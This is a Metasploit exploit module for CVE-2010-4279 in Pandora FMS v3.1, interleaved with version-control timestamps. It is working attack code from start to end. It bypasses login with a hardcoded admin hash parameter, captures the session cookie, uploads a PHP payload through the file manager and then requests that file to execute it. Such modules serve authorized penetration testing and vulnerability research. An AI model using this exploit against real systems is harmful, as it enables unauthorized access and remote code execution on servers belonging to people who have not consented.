2013-12-03 13:23:56 +00:00
|
|
|
##
|
2015-01-07 18:12:25 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-12-14 05:08:19 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-12-03 13:23:56 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2014-12-14 05:08:19 +00:00
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Exploit::FileDropper
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
|
|
|
|
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
|
|
|
|
upload which allows a user to upload arbitrary files to the '/images/' directory.
|
|
|
|
|
|
|
|
This module was created as an exercise in the Metasploit Mastery Class at Blackhat
|
|
|
|
that was facilitated by egypt and mubix.
|
|
|
|
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2015-01-05 11:23:22 +00:00
|
|
|
'Juan Galiana Lara', # Vulnerability discovery
|
|
|
|
'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
|
|
|
|
'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
|
|
|
|
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module
|
|
|
|
'_flood <freshbones[at]gmail.com>', # Metasploit module
|
|
|
|
'mubix <mubix[at]room362.com>', # Auth bypass and file upload
|
|
|
|
'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload
|
2014-12-14 05:08:19 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2010-4279'],
|
|
|
|
['OSVDB', '69549'],
|
|
|
|
['BID', '45112']
|
|
|
|
],
|
|
|
|
'Platform' => 'php',
|
|
|
|
'Arch' => ARCH_PHP,
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
['Automatic Targeting', { 'auto' => true }]
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => "Nov 30 2010",
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
|
|
|
base = target_uri.path
|
|
|
|
|
|
|
|
# retrieve software version from login page
|
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(base, 'index.php')
|
|
|
|
})
|
|
|
|
if res and res.code == 200
|
2015-01-05 11:23:22 +00:00
|
|
|
#Tested on v3.1 Build PC100609 and PC100608
|
|
|
|
if res.body.include?("v3.1 Build PC10060")
|
2015-01-07 10:38:19 +00:00
|
|
|
return Exploit::CheckCode::Appears
|
2014-12-14 05:08:19 +00:00
|
|
|
elsif res.body.include?("Pandora")
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
rescue ::Rex::ConnectionError
|
2015-01-07 18:12:25 +00:00
|
|
|
vprint_error("#{peer} - Connection failed")
|
2014-12-14 05:08:19 +00:00
|
|
|
end
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
# upload a payload using the pandora built-in file upload
|
|
|
|
def upload(base, file, cookies)
|
2015-01-07 10:38:19 +00:00
|
|
|
data = Rex::MIME::Message.new
|
|
|
|
data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
|
|
|
|
data.add_part("Go", nil, nil, 'form-data; name="go"')
|
|
|
|
data.add_part("images", nil, nil, 'form-data; name="directory"')
|
|
|
|
data.add_part("1", nil, nil, 'form-data; name="upload_file"')
|
|
|
|
data_post = data.to_s
|
|
|
|
data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
|
2014-12-14 05:08:19 +00:00
|
|
|
|
2015-01-07 10:38:19 +00:00
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(base, 'index.php'),
|
|
|
|
'cookie' => cookies,
|
|
|
|
'ctype' => "multipart/form-data; boundary=#{data.bound}",
|
|
|
|
'vars_get' => {
|
|
|
|
'sec' => 'gsetup',
|
|
|
|
'sec2' => 'godmode/setup/file_manager',
|
|
|
|
},
|
|
|
|
'data' => data_post
|
|
|
|
})
|
2014-12-14 05:08:19 +00:00
|
|
|
|
2015-01-07 10:38:19 +00:00
|
|
|
register_files_for_cleanup(@fname)
|
|
|
|
return res
|
2014-12-14 05:08:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
|
|
|
base = target_uri.path
|
2015-01-05 11:23:22 +00:00
|
|
|
@fname = "#{rand_text_numeric(7)}.php"
|
2014-12-14 05:08:19 +00:00
|
|
|
cookies = ""
|
|
|
|
|
|
|
|
# bypass authentication and get session cookie
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(base, 'index.php'),
|
|
|
|
'vars_get' => {
|
|
|
|
'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',
|
|
|
|
'loginhash_user' => 'admin',
|
|
|
|
'loginhash' => '1',
|
|
|
|
},
|
|
|
|
})
|
|
|
|
|
|
|
|
# fix if logic
|
|
|
|
if res and res.code == 200
|
|
|
|
if res.body.include?("Logout")
|
|
|
|
cookies = res.get_cookies
|
2015-01-07 16:19:17 +00:00
|
|
|
print_status("Login Bypass Successful")
|
|
|
|
print_status("cookie monster = " + cookies)
|
2014-12-14 05:08:19 +00:00
|
|
|
else
|
2015-01-07 16:19:17 +00:00
|
|
|
fail_with(Exploit::Failure::NotVulnerable, "Login Bypass Failed")
|
2014-12-14 05:08:19 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# upload PHP payload to images/[fname]
|
2015-01-07 10:38:19 +00:00
|
|
|
print_status("#{peer} - Uploading PHP payload (#{payload.encoded.length} bytes)")
|
2014-12-14 05:08:19 +00:00
|
|
|
php = %Q|<?php #{payload.encoded} ?>|
|
|
|
|
begin
|
|
|
|
res = upload(base, php, cookies)
|
|
|
|
rescue ::Rex::ConnectionError
|
2015-01-07 10:38:19 +00:00
|
|
|
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
|
|
|
|
end
|
|
|
|
|
|
|
|
if res and res.code == 200
|
|
|
|
print_good("#{peer} - File uploaded successfully")
|
|
|
|
else
|
|
|
|
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Uploading PHP payload failed")
|
2014-12-14 05:08:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# retrieve and execute PHP payload
|
2015-01-07 10:38:19 +00:00
|
|
|
print_status("#{peer} - Executing payload (images/#{@fname})")
|
2014-12-14 05:08:19 +00:00
|
|
|
begin
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(base, 'images', "#{@fname}")
|
2015-01-07 17:11:33 +00:00
|
|
|
}, 1)
|
2015-01-07 10:38:19 +00:00
|
|
|
rescue ::Rex::ConnectionError
|
|
|
|
fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
|
2014-12-14 05:08:19 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
2013-12-03 13:23:56 +00:00
|
|
|
end
|